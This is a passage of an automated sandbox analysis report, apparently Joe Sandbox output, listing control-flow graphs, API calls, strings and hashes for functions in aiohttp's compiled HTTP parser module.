                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Dealloc$Err_String
                                                                                                                                                                                                                                    • String ID: 'NoneType' object is not subscriptable$Expected %s, got %.200s$aiohttp._http_parser.__pyx_unpickle_RawResponseMessage__set_state$object of type 'NoneType' has no len()$unicode
                                                                                                                                                                                                                                    • API String ID: 2454408770-2005241057
                                                                                                                                                                                                                                    • Opcode ID: c017620a9760a9442f8f73742133af3e48a736a1fd6c906f475f2f53871eb7e5
                                                                                                                                                                                                                                    • Instruction ID: 22bf0d00cad47d8efe4c9b3898d59d7fba2cc48d41f045359c0775be40b90f0c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c017620a9760a9442f8f73742133af3e48a736a1fd6c906f475f2f53871eb7e5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 542261A5E0AA52C1FB5BAB35E95027527A8BB44B95F0440B2CF2D87794DF2FF4068730
                                                                                                                                                                                                                                    Function 00007FFBAA7FBC74 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1954698041.00007FFBAA271000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBAA270000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1954643232.00007FFBAA270000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1958097857.00007FFBAA817000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1959589060.00007FFBAA99D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1959795648.00007FFBAA9AB000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1959841639.00007FFBAA9AC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1959959397.00007FFBAA9B0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffbaa270000_stub.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2933794660-0
                                                                                                                                                                                                                                    • Opcode ID: 94c9acafe10be122d2f397f1e5ea694c59c3688944f7c31b8d4002f49b5f86db
                                                                                                                                                                                                                                    • Instruction ID: d6cec44ded242f2a34f506dd9a16dedbb96992083dcb87dff546f4e4375316e7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94c9acafe10be122d2f397f1e5ea694c59c3688944f7c31b8d4002f49b5f86db
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D114C62B55B01CAEB018F70E8442A833A8F719758F040E76EE6E86BA4DF7CD1568390
                                                                                                                                                                                                                                    Function 00007FFBAAF0BFE0 Relevance: 63.4, APIs: 27, Strings: 9, Instructions: 368COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 6073 7ffbaaf0bfe0-7ffbaaf0c036 6074 7ffbaaf0c03c-7ffbaaf0c040 6073->6074 6075 7ffbaaf0c586-7ffbaaf0c58d 6073->6075 6074->6075 6076 7ffbaaf0c046-7ffbaaf0c071 call 7ffbaaf27060 6074->6076 6077 7ffbaaf0c590-7ffbaaf0c5b3 6075->6077 6085 7ffbaaf0c073-7ffbaaf0c084 6076->6085 6086 7ffbaaf0c089-7ffbaaf0c0b4 call 7ffbaaf27060 6076->6086 6078 7ffbaaf0c5c4-7ffbaaf0c5cf 6077->6078 6079 7ffbaaf0c5b5-7ffbaaf0c5b9 6077->6079 6083 7ffbaaf0c5e1-7ffbaaf0c5ec 6078->6083 6084 7ffbaaf0c5d1-7ffbaaf0c5d6 6078->6084 6079->6078 6082 7ffbaaf0c5bb-7ffbaaf0c5be _Py_Dealloc 6079->6082 6082->6078 6088 7ffbaaf0c5fe-7ffbaaf0c60e 6083->6088 6089 7ffbaaf0c5ee-7ffbaaf0c5f3 6083->6089 6084->6083 6087 7ffbaaf0c5d8-7ffbaaf0c5db _Py_Dealloc 6084->6087 6090 7ffbaaf0c39f-7ffbaaf0c3b3 call 7ffbaaf29db0 6085->6090 6099 7ffbaaf0c0cc-7ffbaaf0c0e5 PyBytes_AsStringAndSize 6086->6099 6100 7ffbaaf0c0b6-7ffbaaf0c0c7 6086->6100 6087->6083 6093 7ffbaaf0c61f-7ffbaaf0c638 call 7ffbaaf32dc0 6088->6093 6094 7ffbaaf0c610-7ffbaaf0c614 6088->6094 6089->6088 6092 7ffbaaf0c5f5-7ffbaaf0c5f8 _Py_Dealloc 6089->6092 6090->6077 6092->6088 6094->6093 6096 7ffbaaf0c616-7ffbaaf0c619 _Py_Dealloc 6094->6096 6096->6093 6103 7ffbaaf0c0f7-7ffbaaf0c112 call 7ffbaaf01000 6099->6103 6104 7ffbaaf0c0e7-7ffbaaf0c0f2 6099->6104 6100->6090 6109 7ffbaaf0c1b5-7ffbaaf0c1c3 6103->6109 6110 7ffbaaf0c118-7ffbaaf0c11f 6103->6110 6105 7ffbaaf0c201-7ffbaaf0c225 call 7ffbaaf29db0 6104->6105 6105->6090 6112 7ffbaaf0c1e3-7ffbaaf0c1f4 call 7ffbaaf25e50 6109->6112 6113 7ffbaaf0c1c5-7ffbaaf0c1e1 PyErr_SetString 6109->6113 6114 7ffbaaf0c14f-7ffbaaf0c15d 6110->6114 6115 7ffbaaf0c121-7ffbaaf0c14a PyErr_Format 6110->6115 6125 7ffbaaf0c22a-7ffbaaf0c240 6112->6125 6126 7ffbaaf0c1f6 6112->6126 6116 7ffbaaf0c1fb 6113->6116 6118 7ffbaaf0c15f-7ffbaaf0c171 6114->6118 6119 7ffbaaf0c173-7ffbaaf0c17e 6114->6119 6115->6105 6116->6105 6123 7ffbaaf0c19f-7ffbaaf0c1a2 6118->6123 6120 7ffbaaf0c18f-7ffbaaf0c199 PyUnicode_Decode 6119->6120 6121 7ffbaaf0c180-7ffbaaf0c18d PyUnicode_DecodeUTF8 6119->6121 6120->6123 6121->6123 6124 7ffbaaf0c1a8-7ffbaaf0c1b3 6123->6124 6123->6125 6124->6105 6127 7ffbaaf0c242-7ffbaaf0c254 6125->6127 6128 7ffbaaf0c256-7ffbaaf0c261 6125->6128 6126->6116 6129 7ffbaaf0c285-7ffbaaf0c288 6127->6129 6130 7ffbaaf0c272-7ffbaaf0c27c PyUnicode_Decode 6128->6130 6131 7ffbaaf0c263-7ffbaaf0c270 PyUnicode_DecodeUTF8 6128->6131 6133 7ffbaaf0c2a0-7ffbaaf0c2c8 6129->6133 6134 7ffbaaf0c28a-7ffbaaf0c29b 6129->6134 6132 7ffbaaf0c282 6130->6132 6131->6132 6132->6129 6135 7ffbaaf0c2cf PyObject_GetAttr 6133->6135 6136 7ffbaaf0c2ca-7ffbaaf0c2cd 6133->6136 6134->6090 6137 7ffbaaf0c2d5-7ffbaaf0c2de 6135->6137 6136->6137 6139 7ffbaaf0c2e0-7ffbaaf0c2f1 6137->6139 6140 7ffbaaf0c2f6-7ffbaaf0c307 6137->6140 6139->6090 6141 7ffbaaf0c32d-7ffbaaf0c35c call 7ffbaaf27060 6140->6141 6142 7ffbaaf0c309-7ffbaaf0c310 6140->6142 6148 7ffbaaf0c36d-7ffbaaf0c370 6141->6148 6149 7ffbaaf0c35e-7ffbaaf0c362 6141->6149 6142->6141 6144 7ffbaaf0c312-7ffbaaf0c320 6142->6144 6145 7ffbaaf0c322 _Py_Dealloc 6144->6145 6146 7ffbaaf0c328 6144->6146 6145->6146 6146->6141 6151 7ffbaaf0c372-7ffbaaf0c389 6148->6151 6152 7ffbaaf0c3b8-7ffbaaf0c3bc 6148->6152 6149->6148 6150 7ffbaaf0c364-7ffbaaf0c367 _Py_Dealloc 6149->6150 6150->6148 6155 7ffbaaf0c38b-7ffbaaf0c38f 6151->6155 6156 7ffbaaf0c39a 6151->6156 6153 7ffbaaf0c3be-7ffbaaf0c3c1 _Py_Dealloc 6152->6153 6154 7ffbaaf0c3c7-7ffbaaf0c3cc 6152->6154 6153->6154 6157 7ffbaaf0c3ce-7ffbaaf0c3d1 _Py_Dealloc 6154->6157 6158 7ffbaaf0c3d7-7ffbaaf0c3e3 6154->6158 6155->6156 6159 7ffbaaf0c391-7ffbaaf0c394 _Py_Dealloc 6155->6159 6156->6090 6157->6158 6160 7ffbaaf0c450-7ffbaaf0c465 PyByteArray_Resize 6158->6160 6161 7ffbaaf0c3e5-7ffbaaf0c3f0 6158->6161 6159->6156 6164 7ffbaaf0c476-7ffbaaf0c47a 6160->6164 6165 7ffbaaf0c467-7ffbaaf0c471 6160->6165 6162 7ffbaaf0c3f2-7ffbaaf0c3f9 6161->6162 6163 7ffbaaf0c433-7ffbaaf0c441 6161->6163 6162->6163 6166 7ffbaaf0c3fb-7ffbaaf0c42e PyErr_Format 6162->6166 6167 7ffbaaf0c443 _Py_Dealloc 6163->6167 6168 7ffbaaf0c449 6163->6168 6170 7ffbaaf0c47c-7ffbaaf0c47f _Py_Dealloc 6164->6170 6171 7ffbaaf0c485-7ffbaaf0c49a PyByteArray_Resize 6164->6171 6169 7ffbaaf0c558-7ffbaaf0c563 6165->6169 6166->6090 6167->6168 6168->6160 6169->6090 6172 7ffbaaf0c569-7ffbaaf0c572 _Py_Dealloc 6169->6172 6170->6171 6173 7ffbaaf0c4ab-7ffbaaf0c4af 6171->6173 6174 7ffbaaf0c49c-7ffbaaf0c4a6 6171->6174 6172->6090 6175 7ffbaaf0c4b1-7ffbaaf0c4b4 _Py_Dealloc 6173->6175 6176 7ffbaaf0c4ba-7ffbaaf0c4cc 6173->6176 6174->6169 6175->6176 6177 7ffbaaf0c4ce-7ffbaaf0c4fd PyErr_Format 6176->6177 6178 7ffbaaf0c502-7ffbaaf0c513 PyTuple_New 6176->6178 6177->6090 6179 7ffbaaf0c52b-7ffbaaf0c54c call 7ffbaaf06920 6178->6179 6180 7ffbaaf0c515-7ffbaaf0c526 6178->6180 6183 7ffbaaf0c54e-7ffbaaf0c553 6179->6183 6184 7ffbaaf0c577-7ffbaaf0c57b 6179->6184 6180->6090 6183->6169 6184->6075 6185 7ffbaaf0c57d-7ffbaaf0c580 _Py_Dealloc 6184->6185 6185->6075
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Dealloc$Array_ByteErr_FormatResize$Tuple_
                                                                                                                                                                                                                                    • String ID: 'NoneType' object has no attribute '%.30s'$'NoneType' object is not subscriptable$Expected %s, got %.200s$aiohttp._http_parser.HttpParser._process_header$aiohttp._http_parser.find_header$append$decode$surrogateescape$unicode
                                                                                                                                                                                                                                    • API String ID: 879993430-1055671119
                                                                                                                                                                                                                                    • Opcode ID: 39bea3a2f97f1619dd5661fbca9491245f5c4259de192382fe959cc27338d585
                                                                                                                                                                                                                                    • Instruction ID: 68158d5083486759826427e2a159243626355c34e0d04142d178336084a53be9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39bea3a2f97f1619dd5661fbca9491245f5c4259de192382fe959cc27338d585
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B00262B5A0AA42D1EB5BAB31E8401B963A8FB44B95F5440B1CD2D977A4DF3EE4478330
                                                                                                                                                                                                                                    Function 00007FFBAAF0AFC0 Relevance: 58.2, APIs: 24, Strings: 9, Instructions: 406COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 6186 7ffbaaf0afc0-7ffbaaf0afcc 6187 7ffbaaf0afce-7ffbaaf0b007 PyErr_Format 6186->6187 6188 7ffbaaf0b015-7ffbaaf0b018 6186->6188 6189 7ffbaaf0b00d-7ffbaaf0b013 6187->6189 6190 7ffbaaf0b037-7ffbaaf0b090 PyLong_FromLong 6188->6190 6191 7ffbaaf0b01a-7ffbaaf0b01f 6188->6191 6189->6188 6193 7ffbaaf0b092-7ffbaaf0b0a4 6190->6193 6194 7ffbaaf0b0a9-7ffbaaf0b0ba PyTuple_New 6190->6194 6191->6190 6192 7ffbaaf0b021-7ffbaaf0b035 call 7ffbaaf26bb0 6191->6192 6192->6189 6192->6190 6198 7ffbaaf0b594-7ffbaaf0b5a9 call 7ffbaaf29db0 6193->6198 6195 7ffbaaf0b0cc-7ffbaaf0b16e call 7ffbaaf26d60 6194->6195 6196 7ffbaaf0b0bc-7ffbaaf0b0c7 6194->6196 6210 7ffbaaf0b170-7ffbaaf0b182 6195->6210 6211 7ffbaaf0b187-7ffbaaf0b194 6195->6211 6199 7ffbaaf0b3ce-7ffbaaf0b3da 6196->6199 6207 7ffbaaf0b5ab-7ffbaaf0b5ae 6198->6207 6205 7ffbaaf0b3dc-7ffbaaf0b3df _Py_Dealloc 6199->6205 6206 7ffbaaf0b3e5-7ffbaaf0b3e8 6199->6206 6205->6206 6208 7ffbaaf0b3ee 6206->6208 6209 7ffbaaf0b580-7ffbaaf0b583 6206->6209 6212 7ffbaaf0b5cc-7ffbaaf0b5ed 6207->6212 6213 7ffbaaf0b5b0 6207->6213 6214 7ffbaaf0b571-7ffbaaf0b575 6208->6214 6209->6198 6217 7ffbaaf0b585-7ffbaaf0b589 6209->6217 6210->6198 6215 7ffbaaf0b20f-7ffbaaf0b216 6211->6215 6216 7ffbaaf0b196-7ffbaaf0b1a7 PyTuple_New 6211->6216 6219 7ffbaaf0b5ff-7ffbaaf0b609 6212->6219 6220 7ffbaaf0b5ef-7ffbaaf0b5f4 6212->6220 6218 7ffbaaf0b5bd-7ffbaaf0b5c1 6213->6218 6214->6209 6223 7ffbaaf0b577-7ffbaaf0b57a _Py_Dealloc 6214->6223 6225 7ffbaaf0b256-7ffbaaf0b258 6215->6225 6226 7ffbaaf0b218-7ffbaaf0b21f 6215->6226 6221 7ffbaaf0b1c0-7ffbaaf0b1da PyNumber_InPlaceAdd 6216->6221 6222 7ffbaaf0b1a9-7ffbaaf0b1bb 6216->6222 6217->6198 6224 7ffbaaf0b58b-7ffbaaf0b58e _Py_Dealloc 6217->6224 6218->6212 6228 7ffbaaf0b5c3-7ffbaaf0b5c6 _Py_Dealloc 6218->6228 6220->6219 6230 7ffbaaf0b5f6-7ffbaaf0b5f9 _Py_Dealloc 6220->6230 6231 7ffbaaf0b1ec-7ffbaaf0b1f0 6221->6231 6232 7ffbaaf0b1dc-7ffbaaf0b1e7 6221->6232 6222->6198 6223->6209 6224->6198 6229 7ffbaaf0b25b-7ffbaaf0b260 6225->6229 6226->6225 6227 7ffbaaf0b221-7ffbaaf0b228 6226->6227 6227->6225 6233 7ffbaaf0b22a-7ffbaaf0b231 6227->6233 6228->6212 6234 7ffbaaf0b266-7ffbaaf0b27b 6229->6234 6235 7ffbaaf0b407-7ffbaaf0b41c 6229->6235 6230->6219 6237 7ffbaaf0b1fb-7ffbaaf0b205 6231->6237 6238 7ffbaaf0b1f2-7ffbaaf0b1f5 _Py_Dealloc 6231->6238 6236 7ffbaaf0b56a 6232->6236 6233->6225 6239 7ffbaaf0b233-7ffbaaf0b23a 6233->6239 6242 7ffbaaf0b27d-7ffbaaf0b287 6234->6242 6243 7ffbaaf0b2de-7ffbaaf0b317 _PyDict_GetItem_KnownHash 6234->6243 6240 7ffbaaf0b41e-7ffbaaf0b428 6235->6240 6241 7ffbaaf0b47f-7ffbaaf0b4b8 _PyDict_GetItem_KnownHash 6235->6241 6236->6214 6237->6234 6244 7ffbaaf0b207-7ffbaaf0b20d _Py_Dealloc 6237->6244 6238->6237 6239->6225 6247 7ffbaaf0b23c-7ffbaaf0b245 6239->6247 6248 7ffbaaf0b439-7ffbaaf0b452 call 7ffbaaf25c40 6240->6248 6249 7ffbaaf0b42a-7ffbaaf0b434 6240->6249 6252 7ffbaaf0b4bf-7ffbaaf0b4c8 PyErr_Occurred 6241->6252 6253 7ffbaaf0b4ba-7ffbaaf0b4bd 6241->6253 6250 7ffbaaf0b298-7ffbaaf0b2b1 call 7ffbaaf25c40 6242->6250 6251 7ffbaaf0b289-7ffbaaf0b293 6242->6251 6245 7ffbaaf0b31f-7ffbaaf0b328 PyErr_Occurred 6243->6245 6246 7ffbaaf0b319-7ffbaaf0b31d 6243->6246 6244->6234 6255 7ffbaaf0b32e-7ffbaaf0b336 call 7ffbaaf25d60 6245->6255 6256 7ffbaaf0b32a-7ffbaaf0b32c 6245->6256 6254 7ffbaaf0b339-7ffbaaf0b33c 6246->6254 6247->6229 6257 7ffbaaf0b247-7ffbaaf0b24e 6247->6257 6258 7ffbaaf0b4d9-7ffbaaf0b4dc 6248->6258 6276 7ffbaaf0b458-7ffbaaf0b461 PyErr_Occurred 6248->6276 6249->6258 6250->6254 6279 7ffbaaf0b2b7-7ffbaaf0b2c0 PyErr_Occurred 6250->6279 6251->6254 6261 7ffbaaf0b4ce-7ffbaaf0b4d6 call 7ffbaaf25d60 6252->6261 6262 7ffbaaf0b4ca-7ffbaaf0b4cc 6252->6262 6253->6258 6268 7ffbaaf0b33e-7ffbaaf0b350 6254->6268 6269 7ffbaaf0b355-7ffbaaf0b366 PyTuple_New 6254->6269 6255->6254 6256->6254 6257->6229 6267 7ffbaaf0b250-7ffbaaf0b254 6257->6267 6264 7ffbaaf0b4de-7ffbaaf0b4f0 6258->6264 6265 7ffbaaf0b4f5-7ffbaaf0b506 PyTuple_New 6258->6265 6261->6258 6262->6258 6264->6198 6273 7ffbaaf0b51c-7ffbaaf0b55d PyTuple_New 6265->6273 6274 7ffbaaf0b508-7ffbaaf0b51a 6265->6274 6267->6229 6268->6198 6277 7ffbaaf0b370-7ffbaaf0b3c1 PyTuple_New 6269->6277 6278 7ffbaaf0b368-7ffbaaf0b36e 6269->6278 6280 7ffbaaf0b55f-7ffbaaf0b564 6273->6280 6281 7ffbaaf0b5b2-7ffbaaf0b5b9 6273->6281 6274->6217 6276->6258 6282 7ffbaaf0b463-7ffbaaf0b47d PyErr_Format 6276->6282 6284 7ffbaaf0b3f3-7ffbaaf0b402 6277->6284 6285 7ffbaaf0b3c3 6277->6285 6283 7ffbaaf0b3c9 6278->6283 6279->6254 6286 7ffbaaf0b2c2-7ffbaaf0b2dc PyErr_Format 6279->6286 6280->6236 6281->6218 6282->6258 6283->6199 6284->6207 6285->6283 6286->6254
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Dealloc$Err_FormatFromLongLong_Tuple_
                                                                                                                                                                                                                                    • String ID: %.200s() takes %.8s %zd positional argument%.1s (%zd given)$B$$X$$]$$__reduce_cython__$aiohttp._http_parser.RawResponseMessage.__reduce_cython__$exactly$name '%U' is not defined$$
                                                                                                                                                                                                                                    • API String ID: 1435629709-1486949237
                                                                                                                                                                                                                                    • Opcode ID: 4edf90ac2fea01e43d0f43e2bb7282b1db1302653dd413ddb69e056aa68ed795
                                                                                                                                                                                                                                    • Instruction ID: ebb7869c174ca8dea68117edf5f0aa087d61643a3a8f56d5aaabcb30ecbe06c9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4edf90ac2fea01e43d0f43e2bb7282b1db1302653dd413ddb69e056aa68ed795
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C0287A5A0AF46D1EB5A9F32E94027973A8FB44B81F0440B5CE5E97754EF3EE4528320
                                                                                                                                                                                                                                    Function 00007FFBAAF12BA0 Relevance: 58.1, APIs: 31, Strings: 2, Instructions: 380threadCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 6287 7ffbaaf12ba0-7ffbaaf12c0b _PyThreadState_UncheckedGet 6288 7ffbaaf12c12-7ffbaaf12c19 6287->6288 6289 7ffbaaf12c1b-7ffbaaf12c1e 6288->6289 6290 7ffbaaf12c20-7ffbaaf12c27 6288->6290 6289->6290 6291 7ffbaaf12c2e-7ffbaaf12c42 6289->6291 6290->6291 6292 7ffbaaf12c29-7ffbaaf12c2c 6290->6292 6293 7ffbaaf12c44 6291->6293 6294 7ffbaaf12c47-7ffbaaf12c4a 6291->6294 6292->6288 6293->6294 6295 7ffbaaf12c4c 6294->6295 6296 7ffbaaf12c4f-7ffbaaf12c52 6294->6296 6295->6296 6297 7ffbaaf12c54 6296->6297 6298 7ffbaaf12c57-7ffbaaf12c63 6296->6298 6297->6298 6299 7ffbaaf12ea4-7ffbaaf12ec2 call 7ffbaaf06990 6298->6299 6300 7ffbaaf12c69-7ffbaaf12c7e 6298->6300 6313 7ffbaaf12ec8-7ffbaaf12ecd 6299->6313 6314 7ffbaaf13109-7ffbaaf1310d 6299->6314 6302 7ffbaaf12c80-7ffbaaf12c8a 6300->6302 6303 7ffbaaf12ce1-7ffbaaf12d1a _PyDict_GetItem_KnownHash 6300->6303 6307 7ffbaaf12c9b-7ffbaaf12cb4 call 7ffbaaf25c40 6302->6307 6308 7ffbaaf12c8c-7ffbaaf12c96 6302->6308 6304 7ffbaaf12d1c-7ffbaaf12d1f 6303->6304 6305 7ffbaaf12d21-7ffbaaf12d2a PyErr_Occurred 6303->6305 6309 7ffbaaf12d3c-7ffbaaf12d42 6304->6309 6311 7ffbaaf12d2c-7ffbaaf12d2f 6305->6311 6312 7ffbaaf12d31-7ffbaaf12d39 call 7ffbaaf25d60 6305->6312 6307->6309 6322 7ffbaaf12cba-7ffbaaf12cc3 PyErr_Occurred 6307->6322 6308->6309 6319 7ffbaaf12d54-7ffbaaf12d69 PyLong_FromSize_t 6309->6319 6320 7ffbaaf12d44-7ffbaaf12d4f 6309->6320 6311->6309 6312->6309 6321 7ffbaaf12ed3-7ffbaaf12ee2 6313->6321 6316 7ffbaaf1310f-7ffbaaf13112 _Py_Dealloc 6314->6316 6317 7ffbaaf13118-7ffbaaf1311c 6314->6317 6316->6317 6323 7ffbaaf1311e-7ffbaaf13121 _Py_Dealloc 6317->6323 6324 7ffbaaf13127 6317->6324 6328 7ffbaaf12d7b-7ffbaaf12d8c PyLong_FromSize_t 6319->6328 6329 7ffbaaf12d6b-7ffbaaf12d76 6319->6329 6320->6321 6326 7ffbaaf12ef3-7ffbaaf12efb 6321->6326 6327 7ffbaaf12ee4-7ffbaaf12ee8 6321->6327 6322->6309 6334 7ffbaaf12cc5-7ffbaaf12cdf PyErr_Format 6322->6334 6323->6324 6335 7ffbaaf1312c-7ffbaaf1313c call 7ffbaaf27830 6324->6335 6330 7ffbaaf12f0c-7ffbaaf12f1c 6326->6330 6331 7ffbaaf12efd-7ffbaaf12f01 6326->6331 6327->6326 6336 7ffbaaf12eea-7ffbaaf12eed _Py_Dealloc 6327->6336 6332 7ffbaaf12d9e-7ffbaaf12dae 6328->6332 6333 7ffbaaf12d8e-7ffbaaf12d99 6328->6333 6329->6321 6340 7ffbaaf12f2d-7ffbaaf12f30 6330->6340 6341 7ffbaaf12f1e-7ffbaaf12f22 6330->6341 6331->6330 6337 7ffbaaf12f03-7ffbaaf12f06 _Py_Dealloc 6331->6337 6338 7ffbaaf12db0-7ffbaaf12db7 6332->6338 6339 7ffbaaf12dd8-7ffbaaf12e1a call 7ffbaaf27060 6332->6339 6333->6321 6334->6309 6348 7ffbaaf13141-7ffbaaf13181 6335->6348 6336->6326 6337->6330 6338->6339 6343 7ffbaaf12db9-7ffbaaf12dc8 6338->6343 6360 7ffbaaf12e2c-7ffbaaf12e31 6339->6360 6361 7ffbaaf12e1c-7ffbaaf12e21 6339->6361 6345 7ffbaaf12f42-7ffbaaf12f5e 6340->6345 6346 7ffbaaf12f32-7ffbaaf12f37 6340->6346 6341->6340 6344 7ffbaaf12f24-7ffbaaf12f27 _Py_Dealloc 6341->6344 6351 7ffbaaf12dd3 6343->6351 6352 7ffbaaf12dca-7ffbaaf12dcd _Py_Dealloc 6343->6352 6344->6340 6355 7ffbaaf12f60-7ffbaaf12f63 6345->6355 6356 7ffbaaf12f85-7ffbaaf12fb3 call 7ffbaaf29db0 call 7ffbaaf26830 6345->6356 6346->6345 6353 7ffbaaf12f39-7ffbaaf12f3c _Py_Dealloc 6346->6353 6349 7ffbaaf1318f-7ffbaaf131a9 call 7ffbaaf32dc0 6348->6349 6350 7ffbaaf13183-7ffbaaf13187 6348->6350 6350->6349 6357 7ffbaaf13189 _Py_Dealloc 6350->6357 6351->6339 6352->6351 6353->6345 6362 7ffbaaf12fdc-7ffbaaf13007 6355->6362 6363 7ffbaaf12f65-7ffbaaf12f73 6355->6363 6394 7ffbaaf12fb9-7ffbaaf12fd4 6356->6394 6395 7ffbaaf1309a-7ffbaaf130b3 6356->6395 6357->6349 6371 7ffbaaf12e3c-7ffbaaf12e46 6360->6371 6372 7ffbaaf12e33-7ffbaaf12e36 _Py_Dealloc 6360->6372 6361->6360 6368 7ffbaaf12e23-7ffbaaf12e26 _Py_Dealloc 6361->6368 6366 7ffbaaf13015-7ffbaaf13018 6362->6366 6367 7ffbaaf13009-7ffbaaf1300d 6362->6367 6369 7ffbaaf12f7c call 7ffbaaf2a3d0 6363->6369 6370 7ffbaaf12f75-7ffbaaf12f7a call 7ffbaaf25990 6363->6370 6376 7ffbaaf1302a-7ffbaaf1302d 6366->6376 6377 7ffbaaf1301a-7ffbaaf1301f 6366->6377 6367->6366 6375 7ffbaaf1300f _Py_Dealloc 6367->6375 6368->6360 6381 7ffbaaf12f81-7ffbaaf12f83 6369->6381 6370->6381 6379 7ffbaaf12e51-7ffbaaf12e57 6371->6379 6380 7ffbaaf12e48-7ffbaaf12e4b _Py_Dealloc 6371->6380 6372->6371 6375->6366 6387 7ffbaaf1303e-7ffbaaf13041 6376->6387 6388 7ffbaaf1302f-7ffbaaf13033 6376->6388 6377->6376 6385 7ffbaaf13021-7ffbaaf13024 _Py_Dealloc 6377->6385 6382 7ffbaaf12e66-7ffbaaf12e6a 6379->6382 6383 7ffbaaf12e59-7ffbaaf12e64 6379->6383 6380->6379 6381->6356 6381->6362 6392 7ffbaaf12e6c-7ffbaaf12e6f _Py_Dealloc 6382->6392 6393 7ffbaaf12e75-7ffbaaf12e89 call 7ffbaaf27190 6382->6393 6383->6321 6385->6376 6390 7ffbaaf13052-7ffbaaf13055 6387->6390 6391 7ffbaaf13043-7ffbaaf13047 6387->6391 6388->6387 6389 7ffbaaf13035-7ffbaaf13038 _Py_Dealloc 6388->6389 6389->6387 6397 7ffbaaf13066-7ffbaaf13069 6390->6397 6398 7ffbaaf13057-7ffbaaf1305b 6390->6398 6391->6390 6396 7ffbaaf13049-7ffbaaf1304c _Py_Dealloc 6391->6396 6392->6393 6410 7ffbaaf12e8b-7ffbaaf12e8e _Py_Dealloc 6393->6410 6411 7ffbaaf12e94-7ffbaaf12ea2 6393->6411 6394->6362 6400 7ffbaaf130bb-7ffbaaf130c6 6395->6400 6401 7ffbaaf130b5 _Py_Dealloc 6395->6401 6396->6390 6406 7ffbaaf1306b-7ffbaaf1306f 6397->6406 6407 7ffbaaf1307a-7ffbaaf13095 